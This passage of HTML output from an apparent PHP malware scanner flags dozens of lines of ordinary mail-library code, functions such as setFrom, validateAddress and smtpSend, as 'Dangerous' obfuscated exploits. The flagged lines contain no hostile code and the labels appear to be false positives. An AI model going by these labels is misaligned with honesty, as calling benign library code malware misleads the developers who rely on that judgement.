</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
